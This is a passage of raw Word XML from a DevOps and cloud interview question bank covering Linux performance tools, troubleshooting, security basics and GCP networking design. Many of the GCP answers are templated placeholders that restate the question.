        <w:t>Cpu Steal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Q893. Explain disk I/O bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Disk I/O bottlenecks occur when storage cannot keep up with read/write demand. Symptoms include high iowait, slow queries, queue depth growth, latency spikes, and application timeouts.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Disk I/o Bottlenecks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Q894. What is inode exhaustion?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Inode exhaustion happens when a filesystem runs out of inode entries even if disk space remains. It is often caused by many small files, logs, caches, or temporary files.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Inode Exhaustion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Q895. Explain Linux troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Linux troubleshooting starts by checking symptoms, recent changes, logs, resource usage, processes, network, disk, and service status. Useful commands include journalctl, systemctl, top, df, free, ss, tcpdump, vmstat, iostat, and dmesg.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Linux Troubleshooting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Q896. What is top command?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: top is an interactive Linux command that shows running processes and system resource usage. It helps identify CPU, memory, load, and process-level issues quickly.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Top Command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Q897. Explain htop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: htop is an interactive process viewer with easier navigation than top. It shows CPU, memory, process trees, sorting, filtering, and process actions.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Htop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Q898. What is vmstat?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: vmstat reports virtual memory, CPU, process, swap, and I/O statistics. It is useful for identifying memory pressure, CPU saturation, blocking processes, and swapping.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Vmstat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Q899. Explain iostat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: iostat reports CPU and disk I/O statistics. It helps diagnose storage bottlenecks using metrics such as utilization, await, service time, and read/write throughput.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Iostat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Q900. What is sar?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: sar collects and reports historical system activity such as CPU, memory, disk, network, and load. It is useful for comparing incidents with past baselines.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Sar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Q901. Explain system performance tuning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: System performance tuning improves throughput, latency, and stability by adjusting CPU, memory, disk, network, kernel, and application settings. It should be guided by measurement, baselines, and workload-specific bottlenecks.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>System Performance Tuning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Q902. What is swap memory?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Swap memory is disk space used as an extension of RAM when memory pressure is high. It prevents immediate crashes but excessive swapping causes severe performance degradation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Swap Memory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Q903. Explain OOM killer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The OOM killer is a Linux mechanism that terminates processes when the system runs out of memory. It selects victims based on memory usage and oom score.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Oom Killer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Q904. What is process zombie?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A zombie process has finished execution but still has an entry in the process table because its parent has not collected its exit status. Many zombies can indicate a parent process bug.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Process Zombie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Q905. Explain orphan process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An orphan process is a running process whose parent has exited. It is adopted by init or systemd, and may be normal unless it indicates a failed service or cleanup issue.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Orphan Process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Q906. What is shell scripting?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Shell scripting automates command-line tasks using scripts, variables, conditions, loops, functions, and command execution. It is widely used for operations, deployment, monitoring, and troubleshooting automation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Shell Scripting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Q907. Explain Bash functions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bash functions group reusable shell commands under a name. They improve script readability and avoid duplication for repeated logic.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Bash Functions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Q908. What is awk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: awk is a text-processing language used to scan, filter, transform, and summarize structured text. It is powerful for column-based logs, reports, and command output.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Awk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Q909. Explain sed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: sed is a stream editor used to search, replace, delete, and transform text non-interactively. It is useful in scripts and pipelines for quick text edits.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Sed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Q910. What is grep?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: grep searches text using patterns or regular expressions. It is commonly used to find log lines, configuration values, errors, and matching files.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Grep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Q911. Explain regex.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Regex, or regular expression, is a pattern language for matching text. It is used in searching, validation, parsing, log filtering, and text transformation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Regex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Q912. What is curl?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: curl is a command-line tool for making HTTP and other network requests. It is widely used to test APIs, headers, TLS, authentication, and service reachability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Curl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Q913. Explain wget.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: wget downloads files from HTTP, HTTPS, and FTP endpoints. It is useful for non-interactive downloads, mirroring, and scripts.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Wget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Q914. What is nc command?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: nc, or netcat, reads and writes network connections. It is useful for testing open ports, debugging TCP/UDP connectivity, and simple client/server checks.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Nc Command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Q915. Explain telnet troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Telnet troubleshooting can test raw TCP connectivity to a host and port. Although telnet is insecure for login, it can still help confirm whether a port is reachable.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Telnet Troubleshooting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Q916. What is Linux namespace?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Linux namespaces isolate process views of resources such as PID, network, mount, user, IPC, and UTS. Containers rely heavily on namespaces for isolation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Linux Namespace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Q917. Explain cgroups.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: cgroups control and account for resource usage such as CPU, memory, disk I/O, and processes. Containers use cgroups to enforce resource limits.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cgroups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Q918. What is kernel tuning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Kernel tuning adjusts Linux kernel parameters for performance, reliability, or security. Examples include TCP settings, file descriptor limits, memory behavior, and scheduler-related values.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Kernel Tuning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Q919. Explain sysctl.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: sysctl reads and sets Linux kernel parameters at runtime. Persistent settings are usually placed in sysctl configuration files.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Sysctl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Q920. What are common Linux failures?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common Linux failures include service crashes, disk full, inode exhaustion, memory pressure, OOM kills, CPU saturation, DNS issues, permission problems, corrupted filesystems, and failed dependencies.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Common Linux Failures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Q921. Explain production debugging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Production debugging should be structured, low-risk, and evidence-driven. Start with impact, recent changes, metrics, logs, traces, resource usage, dependency health, and rollback or mitigation options.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Production Debugging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Q922. What are common networking interview scenarios?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common networking scenarios include DNS failure, TLS certificate expiry, packet loss, high latency, firewall blocks, routing errors, load balancer health-check failures, NAT issues, and Kubernetes service connectivity problems.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Common Networking Interview Scenarios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Q923. Explain secure infrastructure design.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Secure infrastructure design applies defense in depth: strong identity, least privilege, network segmentation, encryption, hardened images, patching, logging, vulnerability management, policy as code, and incident response readiness.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Secure Infrastructure Design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Q924. What are common security incidents?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common security incidents include credential leaks, phishing, exposed storage, vulnerable images, privilege escalation, malware, data exfiltration, misconfigured firewalls, and suspicious insider activity.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Common Security Incidents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Q925. Design a zero-trust infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A zero-trust infrastructure verifies every user, device, workload, and request continuously. It uses identity-aware access, MFA, least privilege, microsegmentation, mTLS, policy enforcement, device posture checks, logging, and continuous threat detection.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Zero-trust Infrastructure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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>GCP Networking - Advanced Concepts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q926. Private Google Access: What is Private Google Access, why would you enable it on a subnet, and how does it differ from giving an instance a public IP just to reach Google APIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Private Google Access: What is Private Google Access, why would you enable it on a subnet, and how does it differ from giving an instance a public IP just to reach Google APIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q927. VPC Peering vs Shared VPC: How do VPC Peering and Shared VPC differ in GCP, and what would push you to choose one over the other for connecting workloads across projects?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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VPC Peering vs Shared VPC: How do VPC Peering and Shared VPC differ in GCP, and what would push you to choose one over the other for connecting workloads across projects?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q928. Cloud Interconnect vs Cloud VPN: When would you choose Dedicated Interconnect, Partner Interconnect, or Cloud VPN for connecting on-premises to GCP, and what factors (bandwidth, latency, SLA, cost) drive that choice?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Cloud Interconnect vs Cloud VPN: When would you choose Dedicated Interconnect, Partner Interconnect, or Cloud VPN for connecting on-premises to GCP, and what factors (bandwidth, latency, SLA, cost) drive that choice?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q929. Cloud Load Balancing types: Compare Global external HTTP(S) Load Balancing, regional/internal Load Balancing, TCP/SSL Proxy, and Network Load Balancing in GCP. How would you choose the right one for a given workload?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Cloud Load Balancing types: Compare Global external HTTP(S) Load Balancing, regional/internal Load Balancing, TCP/SSL Proxy, and Network Load Balancing in GCP. How would you choose the right one for a given workload?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q930. VPC-native GKE clusters: Why do VPC-native GKE clusters use alias IP ranges instead of routes-based networking, and what problems does that solve at scale?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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VPC-native GKE clusters: Why do VPC-native GKE clusters use alias IP ranges instead of routes-based networking, and what problems does that solve at scale?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q931. Serverless VPC Access: How would you let a Cloud Run or Cloud Functions service reach a private resource (e.g. a VM or Cloud SQL instance via private IP) inside a VPC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Serverless VPC Access: How would you let a Cloud Run or Cloud Functions service reach a private resource (e.g. a VM or Cloud SQL instance via private IP) inside a VPC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q932. Cloud CDN: How does Cloud CDN integrate with GCP load balancing, and how would you design cache keys and invalidation for a mixed static/dynamic site?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Cloud CDN: How does Cloud CDN integrate with GCP load balancing, and how would you design cache keys and invalidation for a mixed static/dynamic site?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q933. Firewall hierarchy: How do Hierarchical Firewall Policies at the organization or folder level interact with VPC-level firewall rules, and how would you design this so teams can't accidentally open a risky port?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Firewall hierarchy: How do Hierarchical Firewall Policies at the organization or folder level interact with VPC-level firewall rules, and how would you design this so teams can't accidentally open a risky port?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q934. VPC Flow Logs: What would you use VPC Flow Logs for in troubleshooting, security investigation, and cost analysis, and what are the trade-offs of enabling them broadly?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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VPC Flow Logs: What would you use VPC Flow Logs for in troubleshooting, security investigation, and cost analysis, and what are the trade-offs of enabling them broadly?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q935. Network Intelligence Center: How would you use Network Intelligence Center's connectivity tests and topology view to diagnose a 'service A can't reach service B' problem across projects and VPCs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Network Intelligence Center: How would you use Network Intelligence Center's connectivity tests and topology view to diagnose a 'service A can't reach service B' problem across projects and VPCs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q936. Egress control: Compare using Cloud NAT, firewall egress-deny rules, and VPC Service Controls to restrict outbound traffic from a production VPC. When would you combine more than one?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Egress control: Compare using Cloud NAT, firewall egress-deny rules, and VPC Service Controls to restrict outbound traffic from a production VPC. When would you combine more than one?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q937. Multi-region network design: How would you design a GCP network (VPC layout, load balancing, DNS, failover) so an application stays available if an entire region becomes unavailable?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Multi-region network design: How would you design a GCP network (VPC layout, load balancing, DNS, failover) so an application stays available if an entire region becomes unavailable?</w:t>
      </w:r>
